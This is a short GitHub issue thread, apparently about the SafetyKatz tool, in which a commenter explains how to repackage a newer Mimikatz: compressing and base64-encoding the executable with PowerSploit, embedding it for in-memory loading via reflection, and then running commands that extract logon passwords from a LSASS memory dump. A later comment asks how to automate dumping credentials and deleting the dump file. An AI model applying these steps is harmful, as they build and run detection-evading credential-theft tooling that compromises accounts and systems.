
How to upgrade built-in Mimikatz to latest version?

Open wxlg1117 opened this issue 6 years ago • 2 comments

The built-in version is mimikatz 2.1.1 and the latest version is 2.2.0, please.

wxlg1117 avatar May 24 '19 05:05 wxlg1117

Import the PowerSploit module from here: PowerSploit

Import-Module .\PowerSploit.psd1

Compile new Mimikatz... I'll leave that to you. Run Out-CompressedDll against mimikatz.exe and dump to a text file.

Out-CompressedDll .\mimikatz.exe > mimikatz.txt

Grab all the data between

'' ignoring $EncodedCompressedFile = @' and @
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
$UncompressedFileBytes = New-Object Byte[](1119232)
$DeflatedStream.Read($UncompressedFileBytes, 0, 1119232) | Out-Null
[Reflection.Assembly]::Load($UncompressedFileBytes)
You just want the encoded bytes, nothing else.

View Program.cs in the SafetyKatz project and modify the array size of Byte[] unpacked = new byte[1200000]; to the size of your new mimikatz executable. In my case it was 1100000 bytes. Lines 111 and 116 respectively.

Next, under constants.cs, place the new string you generated from mimikatz.txt. Compile and enjoy. Note, the original developer was automatically working with the dump file generated; this will just get you a functional mimikatz where you can execute the proper commands to interact with the dump file. For example: sekurlsa::minidump C:\WINDOWS\Temp\debug.bin sekurlsa::logonpasswords full

Enjoy!

ineffectivecoder avatar Jul 19 '19 22:07 ineffectivecoder

Awesome work bro!! Here is another problem: I want to use mimi like the original developer does in this program, which means I want the program to execute "dumpfile & dump creds & delete debug.bin" automatically. Is there any way to do this with mimi? Please check this.

Thanks a lot.

NickYan7 avatar Aug 06 '21 08:08 NickYan7